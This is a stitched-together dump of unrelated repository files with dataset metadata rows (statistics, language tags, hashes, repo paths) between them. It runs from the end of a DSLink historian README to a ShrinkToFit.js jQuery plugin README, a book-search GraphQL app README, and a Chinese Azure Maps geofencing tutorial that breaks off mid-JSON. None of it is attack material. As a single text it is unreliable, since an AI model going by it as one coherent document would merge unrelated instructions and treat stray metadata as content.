boolean history. ## Main Node This is the root node of the link. It allows you to add database nodes. _Values_ - Enabled - Can be used to disable history collection for the entire link. - Status - The health or condition of the link. - Status Text - Description for the current status. _Actions_ - New Database - Create a new database node. ## Database Node Represents a unique database as defined by the specific implementation. _Values_ - Enabled - Can be used to disable trending and history queries. - Status - The health or condition of the node. - Status Text - Description for the current status. - State - State of the database connection: connecting, connected, disconnecting or disconnected. - Last OK - Timestamp of last successful communication with the database. - Last Fail - Timestamp of last failed connection to the database. _Actions_ - Apply Aliases - Put history aliases on all history subscriptions. - Overwrite - overwrite an existing alias. - Edit - Delete - Delete this object and it's subtree. There are two types of delete: - Node Only - Only remove the node from the tree. - Node and Data - Remove the node and all backing data. - Duplicate - Make a copy of this object and its subtree. - Rename - Change the node name. - New - Group Folder - Add a folder for organizing history groups. - History Group - Add a new history group. - Purge - Removes records in the given time range from all histories in the subtree. - Time Range - Records with timestamps in this range are removed. ## History Group Node Represents a set of histories with a common collection strategy. _Values_ - Enabled - Can be used to disable trending. - Status - The health or condition of the node. - Status Text - Description for the current status. - Interval - Set to collect on a regular interval. Can be combined with COV. - COV - Set to on to enable change of value collection. Use min interval to throttle and max interval to ensure records get written with some regularity. - Min COV Interval - Regulates the minimum interval between records. - Max Records - The maximum number of records to maintain in each history. - Max Age - The oldest record to retain in each history. _Actions_ - Import History - Given a path to a node with a get history action, will create a history child and clone the target history. - Edit - Delete - Delete this object and it's subtree. There are two types of delete: - Node Only - Only remove the node from the tree. - Node and Data - Remove the node and all backing data. - Duplicate - Make a copy of this object and its subtree. - Rename - Change the node name. - New - Folder - Add a folder for organizing histories. - History - Add a new history. - Apply Aliases - Put history aliases on all history subscriptions. - Overwrite - overwrite an existing alias to another path. - Purge - Removes records in the given time range from all histories in the subtree. - Time Range - Records with timestamps in this range are removed. ## History Group Folder Node Use to organize history groups. _Actions_ - Import History - Given a path to a node with a get history action, will create a history child and clone the target history. - Edit - Delete - Delete this object and it's subtree. There are two types of delete: - Node Only - Only remove the node from the tree. - Node and Data - Remove the node and all backing data. - Duplicate - Make a copy of this object and its subtree. - Rename - Change the node name. - New - Group Folder - Add a folder for organizing history groups. - History Group - Add a new history group. - Apply Aliases - Put history aliases on all history subscriptions. - Overwrite - overwrite an existing alias to another path. - Purge - Removes records in the given time range from all histories in the subtree. - Time Range - Records with timestamps in this range are removed. ## History Watch Node Subscribes to a path to create history records. _Values_ - Enabled - Can be used to disable trending. - Status - The health or condition of the node. - Status Text - Description for the current status. - Watch Path - Path to subscribe to. - Watch Type - The type of the data source. Set on the first subscription update. - Watch Value - Current value of the watch path. - Watch Status - Current status of the watch path. - Watch Timestamp - Timestamp of the the watch value and status. - First Timestamp - The earliest record in the history. - Last Timestamp- The last record in the history. - Record Count - The total number of records in the history. - Timezone - Timezone of the data source. - Units - Units of the data source. Only applies to numeric types. - Precision - The number of decimal places. Only applies to numeric types. - Totalized - When true, the historian will automatically delta values in history queries. Only applies to numeric types. _Actions_ - Edit - Delete - Delete this object and it's subtree. There are two types of delete: - Node Only - Only remove the node from the tree. - Node and Data - Remove the node and all backing data. - Duplicate - Make a copy this object. - Rename - Change the node name. - Get History - Queries the history and returns a table. The options are: - Time Range - - Interval - - Rollup - - Apply Alias - Put a history alias on the subscribed point. - Overwrite - overwrite an existing alias to another path. - Add Record - Adds a record to the history. - Time Range - Date time range of the query. - Interval - The time interval of the results. - Rollup - How to combine multiple values in an interval. - Real Time - Whether or not to continue to stream values as new records are created. - Purge - Removes records in the given time range from all histories in the subtree. - Time Range - Records with timestamps in this range are removed. - Overwrite Records - Writes a new value to existing records. - Time Range - Records with timestamps in this range will be modified. - Value - The new value to write. - Status - The new status to write. ## Numeric History Simulator Node Simulates a double value using a sine wave. Will build a history using the max age and max number of records configured on the history group. Once the history is built, will continue to append records to it. _Values_ - Enabled - Can be used to disable trending. - Status - The health or condition of the node. - Status Text - Description for the current status. - Value - The current value of the simulator. - Wave Period - The length of time it takes to complete one cycle of a sine wave. - Wave Height - The height of the sine wave from its least to greatest value. - Wave Offset - The negative or positive value the a amplitude is centered on. - Update Rate - The time interval to calculate the current value. How values are stored in the the database is determined by the collection strategy of the parent group. - First Timestamp - The earliest record in the history. - Last Timestamp- The last record in the history. - Record Count - The total number of records in the history. - Timezone - Timezone of the data source. - Units - Units of the data source. - Precision - The number of decimal places. _Actions_ - Edit - Delete - Delete this object and it's subtree. There are two types of delete: - Node Only - Only remove the node from the tree. - Node and Data - Remove the node and all backing data. - Duplicate - Make a copy this object. - Rename - Change the node name. - Get History - Queries the history and returns a table. The options are: - Time Range - Date time range of the query. - Interval - The time interval of the results. - Rollup - How to combine multiple values in an interval. - Real Time - Whether or not to continue to stream values as new records are created. - Purge - Removes records in the given time range from all histories in the subtree. - Time Range - Records with timestamps in this range are removed. - Overwrite Records - Writes a new value to existing records. - Time Range - Records with timestamps in this range will be modified. - Value - The new value to write. - Status - The new status to write. ## Boolean History Simulator Node Randomly simulates a boolean value. Will build a history using the max age and max number of records configured on the history group. Once the history is built, will continue to append records to it. _Values_ - Enabled - Can be used to disable trending. - Status - The health or condition of the node. - Status Text - Description for the current status. - Value - The current value of the simulator. - True Random - When the current value is true, what percent chance does it have to change to false. - False Random - When the current value is false, what percent chance does it have to change to true. - Update Rate - The time interval to calculate the current value. How values are stored in the the database is determined by the collection strategy of the parent group. - First Timestamp - The earliest record in the history. - Last Timestamp- The last record in the history. - Record Count - The total number of records in the history. - Timezone - Timezone of the data source. - True Text - Display text for true values. - False Text - Display text for false values. _Actions_ - Edit - Delete - Delete this object and it's subtree. There are two types of delete: - Node Only - Only remove the node from the tree. - Node and Data - Remove the node and all backing data. - Duplicate - Make a copy this object. - Rename - Change the node name. - Get History - Queries the history and returns a table. The options are: - Time Range - Date time range of the query. - Interval - The time interval of the results. - Rollup - How to combine multiple values in an interval. - Real Time - Whether or not to continue to stream values as new records are created. - Purge - Removes records in the given time range from all histories in the subtree. - Time Range - Records with timestamps in this range are removed. - Overwrite Records - Writes a new value to existing records. - Time Range - Records with timestamps in this range will be modified. - Value - The new value to write. - Status - The new status to write. ## History Folder Node Use to organize histories. _Actions_ - Import History - Given a path to a node with a get history action, will create a history child and clone the target history. - Edit - Delete - Delete this object and it's subtree. There are two types of delete: - Node Only - Only remove the node from the tree. - Node and Data - Remove the node and all backing data. - Duplicate - Make a copy of this object and its subtree. - Rename - Change the node name. - New - Folder - Add a folder for organizing histories. - History - Add a new history. - Apply Aliases - Put history aliases on subscribed points. - Overwrite - overwrite an existing alias to another path. - Purge - Removes records in the given time range from all histories in the subtree. - Time Range - Records with timestamps in this range are removed. ## Acknowledgements SDK-DSLINK-JAVA This software contains unmodified binary redistributions of [sdk-dslink-java-v2](https://github.com/iot-dsa-v2/sdk-dslink-java-v2), which is licensed and available under the Apache License 2.0. An original copy of the license agreement can be found at https://github.com/iot-dsa-v2/sdk-dslink-java-v2/blob/master/LICENSE
42.422581
123
0.726333
eng_Latn
0.990409
bb2bc5f5b0e55441626fd86c19a2658273f8df97
748
md
Markdown
README.md
FedericoDiRosa/shrinktofit
e8a85bd35852814fb0c9658b72848a9527305b92
[ "MIT" ]
null
null
null
README.md
FedericoDiRosa/shrinktofit
e8a85bd35852814fb0c9658b72848a9527305b92
[ "MIT" ]
null
null
null
README.md
FedericoDiRosa/shrinktofit
e8a85bd35852814fb0c9658b72848a9527305b92
[ "MIT" ]
null
null
null
# ShrinkToFit.js A very light jQuery plugin (only 604 bytes minified) that shrinks text to fit the parent container. This is very handy when dealing with long headings. People speaking nordic languages may know exactly what I am talking about. See this awfully long word in Finnish: **Lentokonesuihkuturbiinimoottoriapumekaanikkoaliupseerioppilas** and try to keep that from breaking your layout. ## Basic Usage ```javascript $('h1').ShrinkToFit(); ``` ## Options ```javascript $('h1').ShrinkToFit({ min: '10px', /* Default: 0px */ wrap: false /* Default: true (white space cause the text to wrap to a new line) */ }); ``` ## Dependencies jQuery 1.2.3 ## Browsers compatibility - IE8+ - Chrome - Firefox - Safari - Opera - iOS - Android
22.666667
152
0.727273
eng_Latn
0.954722
bb2c3bea73d51d66eedbc87115dbdec8700ad5a5
1,839
md
Markdown
README.md
meljack1/book-search
a0ba06853aaa42aa51ee6126a60f163932a6d987
[ "MIT" ]
null
null
null
README.md
meljack1/book-search
a0ba06853aaa42aa51ee6126a60f163932a6d987
[ "MIT" ]
null
null
null
README.md
meljack1/book-search
a0ba06853aaa42aa51ee6126a60f163932a6d987
[ "MIT" ]
null
null
null
# book-search [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) ## Table of Contents * [Description](#description) * [Installation](#installation) * [Usage](#usage) * [License](#license) * [How to Contribute](#how-to-contribute) * [Contact](#contact) ## Description A book search application refactored from a RESTful API to use a GraphQL API and Apollo Server. Refactoring this code made me much more confident in my use of GraphQL, and I had a lot of experience with fixing small bugs in the code. ## Installation Navigate to ```./book-search``` Run the following command from the terminal: ```npm run install``` ## Usage This application is deployed to Heroku at [mels-book-search.herokuapp.com](https://mels-book-search.herokuapp.com/). To run the application for development on a local server, follow the following steps: 1. Ensure MongoDB is installed and set up on your computer before using this application. A guide can be found [here](https://docs.mongodb.com/manual/installation/) 2. Navigate to ```./book-search``` 3. Open a new terminal and run the following command: ```npm run develop``` Screenshots: ![Screenshot of the front page of the application](./assets/screenshot1.PNG) ![Screenshot of the saved books page](./assets/screenshot2.PNG) ![Screenshot of the login modal displayed](./assets/screenshot3.PNG) ## License This project is covered under the MIT License: [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) ## How to Contribute Fork the repository or contact me using the details shown below ## Contact Please feel free to contact me through GitHub or email, using the following details: Email: [email protected] GitHub: [meljack1](https://github.com/meljack1/)
35.365385
233
0.750408
eng_Latn
0.965832
bb2c5280efefdd1aed3e72a201cd6a0a3340eb5e
3,242
md
Markdown
README.md
sarahb23/terraform-aws-portfolio-website
8c27ae141a6c741d47605f8dcee2cdb440debce6
[ "Apache-2.0" ]
1
2021-02-03T13:54:24.000Z
2021-02-03T13:54:24.000Z
README.md
sarahb23/terraform-aws-portfolio-website
8c27ae141a6c741d47605f8dcee2cdb440debce6
[ "Apache-2.0" ]
9
2020-10-07T21:16:08.000Z
2020-10-13T23:00:25.000Z
README.md
zach-23/terraform-aws-portfolio-website
22f3bcc7014631d7842d49c2e764d8246703f479
[ "Apache-2.0" ]
null
null
null
# Personal Portfolio website on AWS S3 with CloudFront and custom domain ### Prerequisites - An AWS account - A domain registered with Route53 - Terraform installed locally or a Terraform cloud account if you want to use the [GitHub actions workflow](.github/workflows/terraform.yml) ### Use this as a Terraform module - Fork this repository - Remove the `backend` block from [`main.tf`](main.tf) - Declare the module ```terraform module "website" { source = "https://github.com/<YOUR_GH_USERNAME>/terraform-aws-portfolio-website" region = "us-east-1" my_url = "example.com" # This is the domain name registered with Route53 env = "dev" # either prod or dev } ``` ### Use this with GitHub Actions and Terraform Cloud - Fork this repository - Follow [this guide](https://learn.hashicorp.com/tutorials/terraform/github-actions?in=terraform/automation) - When following the guide, create TWO workspaces with the same prefix with suffixes of `prod` and `dev` (i.e. `portfolio-dev` and `portfolio-prod`) - Edit the `backend` block in [`main.tf`](main.tf) ```terraform terraform { backend "remote" { organization = "REPLACE ME" workspaces { prefix = "REPLACE ME" } } } ``` - The `dev` workspace is used as a placeholder for pull request validation but can also be used to deploy using the Terraform CLI - Once a pull request to `main` is completed and merged, Terraform will deploy to the `prod` workspace - This repo uses GitHub actions to copy files to S3 and rebuild the CloudFront cache. You can use this [gist](https://gist.github.com/sarahb23/484efc66ca121d8586f2f0916ca8c944) to create an IAM user and add the access keys to the repo as secrets. ### Resources created - Two S3 buckets - Website content hosting - CloudFront logging - Website content uploaded via the `aws cli` - ACM certificate with DNS validation through Route53 - A CloudFront distribution with a custom domain and ACM certificate for HTTPS ### Customizing the website - Site configuration data is located in [`web/public/siteData.json`](web/public/siteData.json) - Replace values in `resumeData` with your relevant information - Editing `siteConfig`: ```json "siteConfig": { "title": "Your Name", "embedResume": null } ``` - If you would like to include a PDF resume, upload it to [`web/public/docs`](web/public/docs/) and change the value of `resumeFileName` from `null` to your file name. - If you would like to use Google Analytics, replace the value of `analyticsID` with your GA Tag ID. - If using the GitHub actions to deploy via Terraform Cloud make sure to run this command locally to include images and files that do not go into source: ```bash # Build the static HTML via Python cd web/ && python3 build_site.py && cd .. # Copy static files to S3 aws s3 sync src/ s3://<WEBSITE_BUCKET_NAME>/web/public --exclude '*.git*' --exclude '*README*' # OPTIONAL Invalidate CloudFront cache to reflect new changes aws cloudfront create-invalidation --distribution-id <CLOUDFRONT_ID> --paths "/" ``` - You can also completely remove the code from `web/public` and replace it with your own!
45.027778
246
0.71314
eng_Latn
0.964902
bb2c6276640df6c81542b2f628f9fcdbed05eaa4
1,116
md
Markdown
intune-user-help/your-windows-version-isnt-yet-supported.md
Ikuko-Konno/IntuneDocs.ja-jp
e7692b5655423c1ce22d5c4a6aa3f2118bd4ab60
[ "CC-BY-4.0", "MIT" ]
null
null
null
intune-user-help/your-windows-version-isnt-yet-supported.md
Ikuko-Konno/IntuneDocs.ja-jp
e7692b5655423c1ce22d5c4a6aa3f2118bd4ab60
[ "CC-BY-4.0", "MIT" ]
null
null
null
intune-user-help/your-windows-version-isnt-yet-supported.md
Ikuko-Konno/IntuneDocs.ja-jp
e7692b5655423c1ce22d5c4a6aa3f2118bd4ab60
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Windows のバージョンがまだサポートされていない | Microsoft Docs titlesuffix: Microsoft Intune description: Windows デバイスのオペレーティング システムのバージョンがまだサポートされていません。 keywords: '' author: lenewsad ms.author: lanewsad manager: dougeby ms.date: 12/06/2018 ms.topic: article ms.prod: '' ms.service: microsoft-intune ms.subservice: end-user ms.technology: '' ms.assetid: 2df53b9b-9195-45c9-b5dd-7eb7642ff219 searchScope: - User help ROBOTS: '' ms.reviewer: chrisgre ms.suite: ems ms.custom: intune-enduser; seodec18 ms.collection: M365-identity-device-management ms.openlocfilehash: 122c4c9db86279b105749ae35834a4ee88c76fc6 ms.sourcegitcommit: ebf72b038219904d6e7d20024b107f4aa68f57e6 ms.translationtype: MTE75 ms.contentlocale: ja-JP ms.lasthandoff: 12/05/2019 ms.locfileid: "72507612" --- # <a name="your-windows-devices-operating-system-version-isnt-yet-supported"></a>Windows デバイスのオペレーティング システムのバージョンがまだサポートされていない テクノロジの開発のペースはとても速いため、デバイスに会社のサポートのテストが追いつけない場合があります。 最新バージョンの Windows では会社の一部のツールが動作しないことも考えられます。 この問題を解決するには、会社のサポートに連絡する必要があります。 連絡先情報については、[ポータル サイト Web サイト](https://go.microsoft.com/fwlink/?linkid=2010980)をご確認ください。
31.885714
126
0.823477
yue_Hant
0.493891
bb2d792ecb1eead79fbc3bb0400ec7cee48c42ae
2,181
md
Markdown
README.md
Gwash3189/nextjs-backend-helpers
377cf842271ee07d3832bebcb86658559bcb77da
[ "MIT" ]
null
null
null
README.md
Gwash3189/nextjs-backend-helpers
377cf842271ee07d3832bebcb86658559bcb77da
[ "MIT" ]
1
2022-01-05T09:27:30.000Z
2022-01-05T09:27:30.000Z
README.md
Gwash3189/nextjs-backend-helpers
377cf842271ee07d3832bebcb86658559bcb77da
[ "MIT" ]
null
null
null
# nextjs-backend-helpers A collection of helpers designed to make fullstack NextJS services easier to create. There are helpers to register API style `controllers`, a database `Repository` class designed to work with [`Prisma`](https://www.prisma.io/), and even testing tools. ## The Problem The NextJS Documentation says "you can build your entire API with API Routes.", but writing API routes in NextJS sucks. Here is an example handler for a post request: ```js export default function handler(req, res) { if (req.method === 'POST') { // Process a POST request } else { // Handle any other HTTP method } } ``` While this is fine for simple routes, it's easy to see how this doesn's scale. ## The Solution `nextjs-backend-helpers` exports a number of use classes and functions to make not suck. ## Controllers To create a class based controller, simply extend the `Controller` base class and `install` it. `Controller`s support middleware through their `before` and `after` methods. ```ts // pages/api/health import { Controller, install, getBody } from 'nextjs-backend-helpers' import { NextApiRequest, NextApiResponse } from 'next' import { UserRepository, UserNotFoundError } from './user-repository' export class ExampleController extends Controller { constructor() { super() this.before((req: NextApiRequest) => { console.log(Cookie.get('secret-cookie-value')) }).only('get') this.after(() => { console.log('im running after the post action has run') }).only('post') this.rescue(Error, (error, request, response) => { response.status(500).json({ errors: [error.message] }) }) this.rescue(UserNotFoundError, (error, request, response) => { const { id } = getQuery<{id: string}>(request) response.status(404).json({ errors: [`Unable to find user ${id}`] }) }) } async get(_request: NextApiRequest, res: NextApiResponse) { const { id } = getQuery<{id: string}>(request) const user = await Repositorys.find(UserRepository).findById(id) return response.json({ data: user }) } } export default install(HealthController) ```
29.472973
251
0.685465
eng_Latn
0.919619
bb2dbc6dc85e346f8eccc9068fcd6ec5b292ec21
4,107
md
Markdown
articles/internet-peering/includes/exchange-portal-configuration.md
afonsogcardoso/azure-docs.pt-br
eb8085d4efa64294d91788cd5c2157c336630e55
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/internet-peering/includes/exchange-portal-configuration.md
afonsogcardoso/azure-docs.pt-br
eb8085d4efa64294d91788cd5c2157c336630e55
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/internet-peering/includes/exchange-portal-configuration.md
afonsogcardoso/azure-docs.pt-br
eb8085d4efa64294d91788cd5c2157c336630e55
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: incluir arquivo titleSuffix: Azure description: incluir arquivo services: internet-peering author: prmitiki ms.service: internet-peering ms.topic: include ms.date: 11/27/2019 ms.author: prmitiki ms.openlocfilehash: cd51eca0ea4563e1b56f74677df0829669d9e177 ms.sourcegitcommit: 2ec4b3d0bad7dc0071400c2a2264399e4fe34897 ms.translationtype: MT ms.contentlocale: pt-BR ms.lasthandoff: 03/27/2020 ms.locfileid: "75774491" --- 1. Na **página Criar um peering,** na guia **Configuração,** preencha os campos conforme mostrado abaixo. > [!div class="mx-imgBorder"] > ![Configuração peering - Troca](../media/setup-exchange-conf-tab.png) * Para **o tipo Peering, selecione** *Exchange*. * Selecione **SKU** como *Basic Free*. * Escolha o local do **metrô** para onde você deseja configurar o peering. > [!NOTE] > Se você já tiver conexões de peering com a Microsoft no local de **Metrô** selecionado e estiver usando o portal pela primeira vez para configurar o peering nesse local, então suas conexões de peering existentes serão listadas na seção **Conexões peering,** conforme mostrado abaixo. A Microsoft converterá automaticamente essas conexões de peering para o recurso Do Zure para que você possa gerenciá-las todas, juntamente com as novas conexões, em um só lugar. Consulte [Converter um recurso do Exchange legado para o recurso do Azure usando o portal](../howto-legacy-exchange-portal.md) para obter mais informações. > 1. Em **Conexões peering,** clique **em Criar uma nova** linha para cada nova conexão que você deseja configurar. * Para configurar/modificar as configurações de conexão, clique no botão editar para uma linha. > [!div class="mx-imgBorder"] > ![Configuração de peering - Edição de troca](../media/setup-exchange-conf-tab-edit.png) * Para excluir uma linha, clique em **...** botão > **Delete**. > [!div class="mx-imgBorder"] > ![Configuração de peering - Edição de troca](../media/setup-exchange-conf-tab-delete.png) * Você é obrigado a fornecer todas as configurações para uma conexão, conforme mostrado abaixo. > [!div class="mx-imgBorder"] > ![Configuração de peering - Conexão de troca](../media/setup-exchange-conf-tab-connection.png) 1. Selecione a **instalação peering** onde a conexão precisa ser configurada. 1. Nos campos **endereço IPv4** e **endereço IPv6,** digite o endereço IPv4 e IPv6, respectivamente, que seria configurado em roteadores da Microsoft usando o comando neighbor. 1. Digite o número de prefixos IPv4 e IPv6 que você anunciará nos campos **Endereços IPv4 anunciados máximos** e **endereços IPv6 anunciados máximos,** respectivamente. 1. Clique em **OK** para salvar suas configurações de conexão. 1. Repita a etapa acima para adicionar mais conexões em qualquer instalação onde a Microsoft esteja situada com sua rede, dentro do **Metro** selecionado anteriormente. 1. Depois de adicionar todas as conexões necessárias, clique em **'Revisar + criar**. > [!div class="mx-imgBorder"] > ![Guia de configuração de peering Final](../media/setup-exchange-conf-tab-final.png) 1. Observe que o portal executa a validação básica das informações inseridas. Isso é exibido em uma fita na parte superior, como *Running validação final...*. > [!div class="mx-imgBorder"] > ![Guia de validação de peering](../media/setup-direct-review-tab-validation.png) 1. Depois de se transformar em *Validação Passada,* verifique suas informações e envie a solicitação clicando **em Criar**. Se você precisar modificar sua solicitação, clique em **Anterior** e repita as etapas acima. > [!div class="mx-imgBorder"] > ![Envio de peering](../media/setup-exchange-review-tab-submit.png) 1. Depois de enviar a solicitação, aguarde que ela seja concluída. Se a implantação falhar, entre em contato com [a Microsoft .](mailto:[email protected]) Uma implantação bem sucedida aparecerá como abaixo. > [!div class="mx-imgBorder"] > ![Sucesso peering](../media/setup-direct-success.png)
55.5
627
0.731921
por_Latn
0.998142
bb2dc914bbf603b4a0489b2319f2ad0d4c39e087
3,245
md
Markdown
README.md
MarskalGroup/marskal-bootstrap-generators
45335c3e3f44a564f40d0005d08de846c010eab3
[ "MIT" ]
null
null
null
README.md
MarskalGroup/marskal-bootstrap-generators
45335c3e3f44a564f40d0005d08de846c010eab3
[ "MIT" ]
null
null
null
README.md
MarskalGroup/marskal-bootstrap-generators
45335c3e3f44a564f40d0005d08de846c010eab3
[ "MIT" ]
null
null
null
# Marskal Bootstrap Generators marskal-bootstrap-generators provides [Twitter Bootstrap](http://getbootstrap.com/) generators for Rails 4. Bootstrap is a toolkit from Twitter designed to kickstart development of webapps and sites. ## Current Twitter Bootstrap version The current supported version of Twitter Bootstrap is 3.3.5. ## Installing Gem In your Gemfile, add this line: gem 'marskal-bootstrap-generators', '~> 3.3.5' Or you can install from latest build: gem 'marskal-bootstrap-generators', git: 'git://github.com/MarskalGroup/marskal-bootstrap-generators.git' Run bundle install: bundle install ## Generators Get started: rails generate marskal:bootstrap:install To overwrite files that already exist, pass the `--force` (`-f`) option. Once you've done that, any time you generate a controller or scaffold, you'll get [Bootstrap](http://twitter.github.com/bootstrap/) templates. ## Usage To print the options and usage run the command `rails generate marskal:bootstrap:install --help` Usage: rails generate marskal:bootstrap:install [options] Options: N/A Runtime options: -f, [--force] # Overwrite files that already exist -p, [--pretend], [--no-pretend] # Run but do not make any changes -q, [--quiet], [--no-quiet] # Suppress status output -s, [--skip], [--no-skip] # Skip files that already exist Copy MarskalBootstrapGenerators default files ## Gemfile Make sure you have these gems placed in your GemFile: gem "bootstrap-sass", "~> 3.3.5" gem 'sass-rails', '~> 5.0' And then run: rails generate marskal:bootstrap:install Now you can customize the look and feel of Bootstrap. ## Assets custom tweaks to the styles will be place in: apps/assets/stylesheets/marskal-bootstrap-generators Be sure to include this file in your application.scss files along with bootstrap .scss files ### Sample application.scss // "bootstrap-sprockets" must be imported before "bootstrap" and "bootstrap/variables" @import "bootstrap-sprockets"; @import "bootstrap"; @import "marskal-bootstrap-generators"; //marskal-bootstap-generators gem ### Javascript Select all jQuery plugins (`app/assets/javascripts/bootstrap.js`) Require Bootstrap Javascripts in app/assets/javascripts/application.js: //= require jquery //= require bootstrap-sprockets Or quickly add only the necessary javascript (Transitions: required for any animation; Popovers: requires Tooltips) //= require bootstrap/collapse //= require bootstrap/modal //= require bootstrap/button //= require bootstrap/affix //= require bootstrap/tab //= require bootstrap/alert //= require bootstrap/transition //= require bootstrap/tooltip //= require bootstrap/popover //= require bootstrap/scrollspy //= require bootstrap/dropdown //= require bootstrap/carousel ## Give it a try rails generate scaffold post title body:text published:boolean ## Customizing Templates Since Marskal Bootstrap Generators installs its templates under lib/templates, you can go and customize them. ## Credits * [Twitter Bootstrap](http://getbootstrap.com)
28.464912
199
0.714638
eng_Latn
0.78295
bb2dffab97e646c45c55cbd1786672fd81e0666e
10,040
md
Markdown
articles/azure-maps/tutorial-geofence.md
eltociear/azure-docs.zh-cn
b24f1a5a0fba668fed89d0ff75ca11d3c691f09b
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/azure-maps/tutorial-geofence.md
eltociear/azure-docs.zh-cn
b24f1a5a0fba668fed89d0ff75ca11d3c691f09b
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/azure-maps/tutorial-geofence.md
eltociear/azure-docs.zh-cn
b24f1a5a0fba668fed89d0ff75ca11d3c691f09b
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: 教程:在地图上创建地理围栏并跟踪设备 | Microsoft Azure Maps description: 了解如何使用 Microsoft Azure Maps 空间服务设置地理围栏并跟踪相对于地理围栏的设备。 author: philmea ms.author: philmea ms.date: 1/15/2020 ms.topic: tutorial ms.service: azure-maps services: azure-maps manager: timlt ms.custom: mvc ms.openlocfilehash: 126829f12d71e40511c26e781cb191988c1d031e ms.sourcegitcommit: 9ee0cbaf3a67f9c7442b79f5ae2e97a4dfc8227b ms.translationtype: HT ms.contentlocale: zh-CN ms.lasthandoff: 03/27/2020 ms.locfileid: "80333864" --- # <a name="tutorial-set-up-a-geofence-by-using-azure-maps"></a>教程:使用 Azure Maps 设置地域隔离区 本教程将引导你完成使用 Azure Maps 设置地理围栏的基本步骤。 请考虑这种情况:工地管理员必须监视潜在的危险设备。 该管理员需确保设备处于所选的整个施工区域中。 这整个施工区域是一个硬参数。 法规要求设备在此参数内保持不变,遇到冲突情况需报告给运营管理员。 我们使用数据上传 API 来存储一个地理围栏,并使用地理围栏 API 来检查设备相对于地理围栏的位置。 数据上传 API 和地理围栏 API 都来自 Azure Maps。 我们还使用 Azure 事件网格来流式传输地理围栏结果,并根据地理围栏结果设置通知。 若要详细了解事件网格,请参阅 [Azure 事件网格](https://docs.microsoft.com/azure/event-grid/overview)。 在本教程中,我们介绍如何执行以下操作: > [!div class="checklist"] > * 使用数据上传 API 在 Azure Maps 数据服务中上传地域隔离区。 > * 设置事件网格用于处理地域隔离区事件。 > * 设置地域隔离区事件处理程序。 > * 使用逻辑应用设置警报以响应地域隔离区事件。 > * 使用 Azure Maps 地域隔离区服务 API 跟踪施工资产是否在工地范围内。 ## <a name="prerequisites"></a>先决条件 ### <a name="create-an-azure-maps-account"></a>创建 Azure Maps 帐户 按照[创建帐户](quick-demo-map-app.md#create-an-account-with-azure-maps)中的说明,在 S1 定价层中创建一个 Azure Maps 帐户订阅。 [获取主键](quick-demo-map-app.md#get-the-primary-key-for-your-account)中的步骤说明了如何检索帐户的主密钥。 有关 Azure Maps 中身份验证的详细信息,请参阅[在 Azure Maps 中管理身份验证](./how-to-manage-authentication.md)。 ## <a name="upload-geofences"></a>上传地域隔离区 我们假设主要地理围栏为子场地 1,它有一个设置好的过期时间。 可根据要求创建更多的嵌套地域隔离区。 可以使用这些围栏集按计划跟踪整个施工区域内的不同施工场地。 例如,子场地 1 的工作可在计划的第 1 至第 4 周进行, 而子场地 2 的工作可在第 5 至第 7 周进行。 可在项目开始时,将所有此类围栏作为单个数据集加载。 这些围栏用于根据时间和空间来跟踪规则。 为了通过数据上传 API 上传工地的地理围栏,我们使用 Postman 应用程序。 安装 [Postman 应用程序](https://www.getpostman.com/)并创建一个免费帐户。 安装 Postman 应用以后,请按以下步骤使用 Azure Maps 数据上传 API 上传工地地理围栏。 1. 打开 Postman 应用,单击“新建”>“新建”并选择“请求”。 输入“上传地域隔离区数据”的请求名称,选择用于保存该请求的集合或文件夹,然后单击“保存”。 ![使用 Postman 上传地理围栏](./media/tutorial-geofence/postman-new.png) 2. 在生成器选项卡上选择 POST HTTP 方法,并输入以下 URL 发出 POST 请求。 ```HTTP https://atlas.microsoft.com/mapData/upload?subscription-key={subscription-key}&api-version=1.0&dataFormat=geojson ``` URL 路径中的 GEOJSON 参数表示正在上传的数据的数据格式。 3. 单击“参数”,输入用于 POST 请求 URL 的以下键/值对。 将 {subscription-key} 替换为你的 Azure Maps 订阅密钥,也称主密钥。 ![Postman 中用于上传数据的参数(地理围栏)](./media/tutorial-geofence/postman-key-vals.png) 4. 单击“正文”,选择原始输入格式,然后从下拉列表中选择“JSON”作为输入格式 。 提供以下 JSON 作为要上传的数据: ```JSON { "type": "FeatureCollection", "features": [ { "type": "Feature", "geometry": { "type": "Polygon", "coordinates": [ [ [ -122.13393688201903, 47.63829579223815 ], [ -122.13389128446579, 47.63782047131512 ], [ -122.13240802288054, 47.63783312249837 ], [ -122.13238388299942, 47.63829037035086 ], [ -122.13393688201903, 47.63829579223815 ] ] ] }, "properties": { "geometryId": "1" } }, { "type": "Feature", "geometry": { "type": "Polygon", "coordinates": [ [ [ -122.13374376296996, 47.63784758098976 ], [ -122.13277012109755, 47.63784577367854 ], [ -122.13314831256866, 47.6382813338708 ], [ -122.1334782242775, 47.63827591198201 ], [ -122.13374376296996, 47.63784758098976 ] ] ] }, "properties": { "geometryId": "2", "validityTime": { "expiredTime": "2019-01-15T00:00:00", "validityPeriod": [ { "startTime": "2019-01-08T01:00:00", "endTime": "2019-01-08T17:00:00", "recurrenceType": "Daily", "recurrenceFrequency": 1, "businessDayOnly": true } ] } } } ] } ``` 5. 单击“发送”并查看响应标头。 成功请求后,**Location** 标头会包含状态 URI。 状态 URI 采用以下格式。 uploadStatusId 值不在 { } 之间。 常见的做法是使用 {} 显示用户必须输入的值或对不同用户不同的值。 ```HTTP https://atlas.microsoft.com/mapData/{uploadStatusId}/status?api-version=1.0 ``` 6. 复制状态 URI 并追加 subscription-key。 状态 URI 格式应如下所示。 请注意,在下面的格式中,你将使用自己的订阅密钥来替换 {subscription-key},不包括 { }。 ```HTTP https://atlas.microsoft.com/mapData/{uploadStatusId}/status?api-version=1.0&subscription-key={Subscription-key} ``` 7. 若要获取 `udId`,请在 Postman 应用中打开一个新选项卡,在生成器选项卡上选择 GET HTTP 方法。在上一步的状态 URI 中发出 GET 请求。 如果数据上传成功,则会在响应正文中收到 udId。 请复制该 udId 供稍后使用。 ```JSON { "status": "Succeeded", "resourceLocation": 